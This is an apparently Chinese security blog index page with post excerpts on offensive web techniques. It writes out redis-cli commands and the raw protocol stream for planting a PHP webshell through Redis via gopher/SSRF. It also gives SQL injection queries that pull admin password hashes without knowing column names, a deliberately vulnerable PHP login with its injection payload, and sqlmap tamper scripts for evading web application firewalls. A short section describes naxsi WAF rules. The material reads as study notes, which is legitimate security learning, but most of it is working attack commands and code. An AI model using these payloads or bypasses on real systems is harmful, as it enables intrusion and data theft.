wubba lubba dub dub.

redis hacker

post @ 2017-12-05

Orange在BH大会的paper上面这么说的:

Protocols that are suitable to smuggle
  HTTP based protocol:
  	Elastic, CouchDB, Mongodb, Docker
  
  Text-based protocol:
    FTP, SMTP, Redis, Memcached

Ph在他https://www.leavesongs.com/PENETRATION/getshell-via-ssrf-and-redis.html里面也提到过,redis的协议是简单的协议流,关于这一点可以查看redis的官方解释: https://redis.io/topics/protocol

https://blog.chaitin.cn/gopher-attack-surfaces/
在这篇文章里面提到使用gopher来攻击redis,使用的步骤是这样的:

  • redis-server启动的时候监听6378端口 redis-server /etc/redis/redis.conf --port 6378
  • 运行socat -v tcp-listen:6379,fork tcp-connetc:localhost:6378
  • 然后再正常使用redis来攻击

写shell

相当于把6379的端口流量转发到6378,而redis-server监听的是6378端口,使用redis-server来写shell是这样的步骤:

redis-cli -h 127.0.0.1 flushall
redis-cli -h 127.0.0.1 config set dir /var/www
redis-cli -h 127.0.0.1 config set dbfilename shell.php
redis-cli -h 127.0.0.1 set webshell "<?php phpinfo();?>"
redis-cli -h 127.0.0.1 save

然后得到的数据流如下:

*1\r
$8\r
flushall\r
*4\r
$6\r
config\r
$3\r
set\r
$3\r
dir\r
$8\r
/var/www\r
*4\r
$6\r
config\r
$3\r
set\r
$10\r
dbfilename\r
$9\r
shell.php\r
*3\r
$3\r
set\r
$3\r
web\r
$18\r
<?php phpinfo();?>\r
*1\r
$4\r
save\r
Read More

SQL注入绕过未知字段名的技巧

post @ 2017-11-28

http://blog.7ell.me/2017/05/30/2017-DDCTF-SQL注入之过滤列名get数据/ 

mysql> select * from (select 1)a,(select 2)b,(select 3)c;
+---+---+---+
| 1 | 2 | 3 |
+---+---+---+
| 1 | 2 | 3 |
+---+---+---+
1 row in set (0.00 sec)

mysql> select * from (select 1)a,(select 2)b,(select 3)c union select * from admin;
+---+--------+----------------------------------+
| 1 | 2      | 3                                |
+---+--------+----------------------------------+
| 1 | 2      | 3                                |
| 1 | admin  | e10adc3949ba59abbe56e057f20f883e |
| 2 | admin2 | 7195ca99696b5a896d067a0fa9dc61a6 |
| 3 | admin3 | 7195C                            |
+---+--------+----------------------------------+
4 rows in set (0.00 sec)

mysql> select e.3 from (select * from (select 1)a,(select 2)b,(select 3)c union select * from admin)e;
+----------------------------------+
| 3                                |
+----------------------------------+
| 3                                |
| e10adc3949ba59abbe56e057f20f883e |
| 7195ca99696b5a896d067a0fa9dc61a6 |
| 7195C                            |
+----------------------------------+
4 rows in set (0.00 sec)

mysql> select e.3 from (select * from (select 1)a,(select 2)b,(select 3)c union select * from admin)e limit 1 offset 3;
+-------+
| 3     |
+-------+
| 7195C |
+-------+
1 row in set (0.00 sec)

mysql> select * from admin where id=1 union select 1,2,3;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | e10adc3949ba59abbe56e057f20f883e |
|  1 | 2        | 3                                |
+----+----------+----------------------------------+
2 rows in set (0.01 sec)

mysql> select * from admin where id=1 union select (select e.3 from (select * from (select 1)a,(select 2)b,(select 3)c union select * from admin)e limit 1 offset 3),2,3;
+-------+----------+----------------------------------+
| id    | username | password                         |
+-------+----------+----------------------------------+
| 1     | admin    | e10adc3949ba59abbe56e057f20f883e |
| 7195C | 2        | 3                                |
+-------+----------+----------------------------------+
2 rows in set (0.00 sec)
Read More

基于order by的盲注

post @ 2017-11-23

http://wonderkun.cc/index.html/?p=547
源代码:

<?php
  $dbhost = "172.19.0.2";
  $dbuser = "root";
  $dbpass = "root";
  $db = "vul";
  $conn = mysqli_connect($dbhost,$dbuser,$dbpass,$db);
  mysqli_set_charset($conn,"utf8");
 
  /* sql
 
     create  table `admin` (
        `id` int(10) not null primary key auto_increment,
        `username` varchar(20) not null ,
        `password` varchar(32) not null
     );
  */
function   filter($str){
      $filterlist = "/\(|\)|username|password|where|
      case|when|like|regexp|into|limit|=|for|;/";
      if(preg_match($filterlist,strtolower($str))){
        die("illegal input!");
      }
      return $str;
  }
$username = isset($_POST['username'])?
filter($_POST['username']):die("please input username!");
$password = isset($_POST['password'])?
filter($_POST['password']):die("please input password!");
$sql = "select * from admin where  username =
 '$username' and password = '$password' ";
 
$res = $conn -> query($sql);
if($res->num_rows>0){
  $row = $res -> fetch_assoc();
  if($row['id']){
     echo $row['username'];
  }
}else{
   echo "The content in the password column is the ";
}
 
?>

在上面这个源代码里面,要首先猜解出username的值,文章里面给的payload是

username='^1^1#&password=1

其实上面的payload初看是不太懂的,才想起来mysql里面弱类型转换的问题,如下:

就是sql语句查询如果username是0的话,所有结果就出来了,那么把这个username变成0,上面的语句都可以做到:

select * from admin where username=''*0
select * from admin where username=''/2
select * from admin where username=''^1^1
select * from admin where username=''-''

然后是基于order by的盲注:

首先是基本知识:

Read More

naxsi的规则

post @ 2017-11-02
  • MainRule: 定义检测的规则和分数
  • BasicRule: 定义MainRule的白名单
  • CheckRule: 定义当分值达到阈值采取的动作

Checkrules

Checkrules指令有四种动作:

LOG, BLOCK, DROP, ALLOW

何时执行这四种动作?根据制定的得分(score)

####Basic Usage

CheckRule "$SQL >= 8" BLOCK;

如果$SQL大于等于8,则BLOCK掉这个请求。(前提是打开防火墙的过滤模式,而不是learning模式)

####Other Usages
看看另外的一种用法,白名单和黑名单一起用的时候,比如有这样的规则:

CheckRule "$UWA >= 4" DROP;
CheckRule "$XSS >= 8" BLOCK;
Read More

bypass firewall

post @ 2017-10-30

狗的绕过比较简单,还是写一下:

https://secvul.com/topics/876.html
http://www.freebuf.com/articles/network/150646.html

根据众多文章的解释,只要把注释符修改下中间加个字符就可以过狗了,比如: /**a**/,tamper.py如下:

#!/usr/bin/env python

"""
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces space character (' ') with comments '/**/'

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass weak and bespoke web application firewalls

    >>> tamper('SELECT id FROM users')
    'SELECT/**/id/**/FROM/**/users'
    """

    retVal = payload

    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += "/**s**/"
                    continue

            elif payload[i] == '\'':
                quote = not quote

            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == " " and not doublequote and not quote:
                retVal += "/**s**/"
                continue

            retVal += payload[i]

    return retVal

米有神马技术含量,然后是绕过数字卫士的,这个得分个类,UNION和Error注入,对于这样的注入需要修改以下的步骤:
首先是修改tamper:

#!/usr/bin/env python

"""
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import os
import re

from lib.core.common import singleTimeWarnMessage
from lib.core.data import kb
from lib.core.enums import DBMS
from lib.core.enums import PRIORITY
from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS

__priority__ = PRIORITY.HIGHER

def dependencies():
    singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s < 5.1" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))

def tamper(payload, **kwargs):
    """
    Adds versioned MySQL comment before each keyword

    Requirement:
        * MySQL < 5.1

    Tested against:
        * MySQL 4.0.18, 5.0.22

    Notes:
        * Useful to bypass several web application firewalls when the
          back-end database management system is MySQL
        * Used during the ModSecurity SQL injection challenge,
          http://modsecurity.org/demo/challenge.html

    >>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
    "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
    """

    def process(match):
        word = match.group('word')
        if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS:
            return match.group().replace(word, "/*!50001%s*/ " % word)
        else:
            return match.group()

    retVal = payload

    if payload:
        retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), retVal)
        retVal = retVal.replace(" /*!50001*/", "/*!50001*/")

    return retVal

注释绕过,如果50001表示如果mysql的版本是5.00.01或者是5.0.1就可以执行这个语句

比如mysql版本是5.5.53:

select * from users where id=1 /*!50553union*/ /*!50002select*/ 3,2,3 order by id desc;

这个语句是可以执行成功的,如果50553变成50554则执行失败

Read More
⬆︎TOP